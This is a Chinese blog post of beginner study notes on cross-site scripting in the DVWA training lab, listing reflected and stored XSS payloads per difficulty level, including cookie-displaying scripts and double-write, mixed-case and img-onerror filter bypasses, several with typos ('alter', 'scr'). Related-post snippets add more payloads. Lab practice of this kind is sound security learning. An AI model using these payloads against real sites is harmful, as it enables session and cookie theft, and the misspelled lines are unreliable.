学习笔记1.0 XSS

最新推荐文章于 2024-07-18 10:12:23 发布
最新推荐文章于 2024-07-18 10:12:23 发布
阅读量193 收藏
点赞数
分类专栏: xss 文章标签: xss 笔记 新手
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43478096/article/details/102907751
版权

xss学习笔记

xss(跨站脚本攻击)注入分为两种:
反射型(Reflected):url取参时进行非法调
用。
存储型(Stored):将非法内容保存到数据库中,
然后系统从数据库中获取的非法内容进行调
用.

dvwa上有已经搭好的xss反射型和存储型注入平台.

反射型(Reflected):
low:<script>alter(/xss/)</script>

<script>document.write(document.cookie)</script>
<script>alert(document.cookie)</script>

medium:
双写: <sc<script>ript>alter(/xss/)</script>
大小写绕过; <ScRipt>alter(/xss/)</script>

high:
无法使用 

<img src=1 onerror=alter(/xxs/)>

impossible:

存储型(Stored):
存储型相对于反射型来说更为复杂一点,较为高级的注入,就另辟蹊径,从name懒进行注入,但name栏有字数限制.于是用burp suite抓包修改。
这里遇到一个问题,发现我的burp suite居然抓不了dvwa的包,得到代理服务器那儿将不代理服务器里面的内容清空。
在这里插入图片描述low:

<script>alter(/xss/)</script>

medium:
也是双写绕过: <sc<script>ript>alter(/name/)</script>
(这里直接抓包在name栏里注入)

大小写绕过:<ScRipt>alter(/name)</script>

high:

<img scr=1 alter(/name/)>

impossible:

详情:https://www.freebuf.com/articles/web/123779.html
进阶:https://blog.csdn.net/God_XiangYu/article/details/97616579

tothemoon_2019
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
熊海cms渗透测试
Panacea
07-16 2104
本来是用来练习代码审计的一个网站,但是代码审计真的好难啊,然后把这个换成了渗透了嘿嘿 安装 这个安装费老大劲了,我用的是phpstudy安装的,全部文件必须在www目录下,其他的都不行 然后php版本要改成5.X 后台 拿到后测试下/admin /login 得到/admin为后台地址 使用弱口令及常见密码失败,尝试其他地方获取用户名和密码 SQL注入 看到这种带有id的尝试SQL注入 加个单引号,报错 手注无果,上sqlmap跑一跑吧hhhhhhhhh 可知存在注入,继续跑,得到用户名和密码,登
XSS学习笔记
m0_47599604的博客
03-18 543
XSS介绍以及分类 XSS介绍 XSS (cross site scripting)跨站脚本,较适合的方式应该叫做跨站脚本攻击,诞生于1996年,人们经常将跨站脚本攻击(cross site scripting)缩写为CSS,但这会层叠样式表(cascading style sheets,CSS )的缩写混淆,因此,有人把跨站脚本攻击缩写为XSS。 分类 反射型(非持久型): 攻击者事先做好攻击链接,需要欺骗用户自己去点击链接才能触发漏洞。 存储型(持久型): payl..
熊海CMS网站SQL注入、XSS攻击、cookie篡改
m0_63917373的博客
11-01 1870
熊海CMS sqlmap工具 SQL注入 XSS cookie篡改
熊海CMS代码审计
weixin_52125240的博客
04-08 4715
熊海CMS代码审计审计准备文件包含漏洞逻辑越权漏洞XSS漏洞SQL注入 前言:也算是第一次代码审计,肯定有很多地方会比较的生疏,也有很多地方不能注意到,所以希望大家也多给建议。 审计准备 我自己安装了phpstudy,然后用phpstudy的环境,来运行熊海的源码。 我们用Seay源代码审计系统先来扫一遍,看看有什么漏洞 扫到的漏洞还挺多的,但是很多都是误报,所以我们一个个去看过来。 文件包含漏洞 <?php //单一入口模式 error_reporting(0); //关闭错误显示 $file=
熊海(isea cms)代码审计漏洞总结
Alexz__的博客
04-30 4356
iseacms简介 后台越权登录admin用户 后台/admin下SQL注入 文件包含漏洞 存储型XSS 管理界面CSRF删除文章 壹 iseacms简介 熊海CMS 是由熊海开发的一款可广泛应用于个人博客,个人网站,企业网站的一套网站综合管理系统。 其采用前后端整合设计思路,php,Apache,mysql,前端使用Bootstrap和少许jquery前端框架开发; 网站样式设计简洁大方,整体功能点并不多,但功能正好够用;拥有一个前端客户端访问界面和一个完备的后台管理系统,并...
《To The Moon》-- 思考、感受
祝你万事顺利的博客
08-10 575
To The Moon 在我看来是 一部视觉小说、一个游戏、一个音乐合辑的完美融合。 从剧情来说是一部科幻小说,小说中充满了悲伤、无奈。但我们在一个悲伤的世界中仍然能感到处处充满着爱,我为故事主人公的遭遇感到心痛,但是在一个个心痛的故事背后,我感受着爱的力量。 玩家操纵两个科技公司的工作人员(Dr. Nell Watts、Dr. Eva Rosalene)...
Java安全防御学习笔记V1.0.docx
06-10
笔记将探讨一些关键的安全策略,包括Web服务器加固、Web应用服务器加固以及应用层加固。 首先,Web服务器加固是防御的第一道防线。Apache和Nginx是最常用的两种Web服务器。对于Apache,强化配置可能涉及限制HTTP...
ASP实例开发源码-在线笔记 v1.0.zip
11-16
这个"ASP实例开发源码-在线笔记 v1.0.zip"文件包含了一个基于ASP技术构建的在线笔记应用的源代码,可以帮助开发者了解ASP的基本用法以及如何实现一个简单的Web应用程序。 在线笔记应用的核心功能可能包括用户注册、...
英语作文在线翻译程序php版v1.0
07-26
【英语作文在线翻译程序php版v1.0】是一个基于Google翻译API开发的PHP应用程序,旨在为用户提供方便快捷的英语作文在线翻译服务。程序的核心功能是利用谷歌翻译的API接口,将用户输入的英语作文自动翻译成中文或其他...
PHP实例开发源码——PHP FexBook v1.0 Beta.zip
11-25
4. **用户认证与授权**:源码可能包含用户注册、登录验证、权限控制等功能,这涉及到加密算法(如MD5或bcrypt)、SQL安全查询以及防止跨站请求伪造(CSRF)和跨站脚本攻击(XSS)的安全措施。 5. **模板引擎**:...
小雪备忘录PHP开源系统(xNote) v1.0.zip
10-02
"小雪备忘录PHP开源系统(xNote) v1.0.zip" 是一个基于PHP语言开发的开源备忘录系统,适用于个人或小型团队记录、管理日常事务。这个系统允许用户创建、编辑、删除备忘录,并可能具备权限管理、搜索功能等。从文件...
熊海cms代码审计
0xdawn的博客
11-10 2581
0x00 前言 ​ 做这次代码审计的时候,距离看《代码审计:企业级web代码安全架构》一书已经过去了差不多一个月的时间了。借着这次机会,开启自己的代码审计之旅吧! 0x01 seay自动审计 环境搭建 本地留了一份进行源码审计,虚拟机win7下搭建作为攻击利用 本地审计 把cms丢进seay源代码审计系统里,先自动审计一番 发现34个可疑漏洞,接下来要做的就是逐一排查,以防误报 0x02 ...
xss挑战之旅11关到13关,操作步骤配截图。
jzzer447的博客
04-15 553
level11 分析代码,相比上一关,多了一个str11=$_SERVER['HTTP_REFERER'];验证的是http头部的xss注入,使用burp抓包,修改相应的字段,构造http头部referer的payload。 头部本身没有Referer,自行添加了 payload:Referer:" onmouseover=alert(11) type="text" Referer:" onclick="alert(11)" type="text level12...
XSS payload (大集合)
m0_51186260的博客
10-18 2994
<script>alert(/xss/)</script> <script>alert(&#38;XSS&#38;)</script> <script>alert(&quot;XSS&quot;)</script>(代替被转义的“”) <INPUT type="text"value='\'><SCRIPT>alert(String.fromCharCode(88,83,83))&l
熊海CMS漏洞练习平台的一次xss、sql注入、越权黑盒思路分析
xt350488的博客
07-14 909
建议自定义错误页面,以避免编程语言特性导致的网站根目录泄露问题,从而减少不必要的安全风险。原文:https://mp.weixin.qq.com/s/NkyXg3Dm5ZzFUGpqn0uzBQ。
xss复习总结及ctfshow做题总结xss
m0_74402888的博客
07-15 663
客户端的脚本程序可以通过DOM动态地检查和修改页面内容,它不依赖于提交数据到服务器端,而从客户端获得DOM中的数据在本地执行,如果DOM中的数据没有经过严格确认,就会产生DOM XSS漏洞。存储型XSS:<持久化> 代码是存储在服务器数据库中的,如在个人信息或发表文章等地方,加入代码,如果没有过滤或过滤不严,那么这些代码将储存到服务器中,每当有用户访问该页面的时候都会触发代码执行,这种XSS非常危险,容易造成蠕虫,大量盗窃cookie(虽然还有种DOM型XSS,但是也还是包括在存储型XSS内)。
防御笔记第七天(时需更新)
weixin_63264424的博客
07-16 753
HRP在进行双机热备时,还有一个要求,两台热设备之间,必须拥有一条链路,用来同步信息,并且,这条链路必须是三层链路---这两条路在进行数据传输时,不受安全策略的影响,(注意,如果心跳线是直连的,则不受安全策略的影响,但是中间有中继设备,即非直连场景,则需要配置安全策略)----心跳线----VGMP发送的报文也是通过心跳线传输的。配置信息---(接口IP地址,路由地址)-----hrp不能同步基本的接口和路由信息,安全策略和NAT策略……状态信息-----会话表,server-map,黑名单和白名单等等。
2024Datawhale AI夏令营---基于术语词典干预的机器翻译挑战赛--学习笔记
weixin_61573157的博客
07-15 1072
机器翻译(Machine Translation,简称MT)是自然语言处理领域的一个重要分支,其目标是将一种语言的文本自动转换为另一种语言的文本。机器翻译的发展可以追溯到20世纪50年代,经历了从基于规则的方法、统计方法到深度学习方法的演变过程。当前,机器翻译正朝着更加智能化和个性化方向发展。一方面,结合上下文理解、情感分析等技术,提高翻译的准确性和自然度;另一方面,通过用户反馈和个性化学习,提供更加符合用户需求的翻译服务。同时,跨语言信息检索、多模态翻译等新兴领域也正在成为研究热点。
C/C++ yaml 库
最新发布
mayue_web的博客
07-18 712
YAML(YAML Ain’t Markup Language)是一种人类可读的数据序列化格式,通常用于配置文件和数据交换。它由Clark Evans在2001年创建,旨在成为一种简单、直观且易于理解的格式。简洁性YAML的设计目标是尽可能简洁,易于阅读和编写。它使用缩进来表示层次结构,而不是像XML那样的标签。易读性YAML文件的可读性非常高,适合人类阅读和编辑,而不仅仅是机器解析。灵活性YAML支持多种数据类型,包括标量(如字符串、整数、浮点数)、序列(列表)、映射(键值对集合)等。扩展性。
XSS漏洞利用深度解析
这篇资料主要探讨了XSS漏洞的利用和挖掘,适合初学者入门学习。 首先,攻击者可能将XSS攻击代码嵌入到网页中,当用户访问这个被注入的页面时,恶意脚本会在用户的浏览器上下文中执行。例如,`alert(1)`或`alert...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值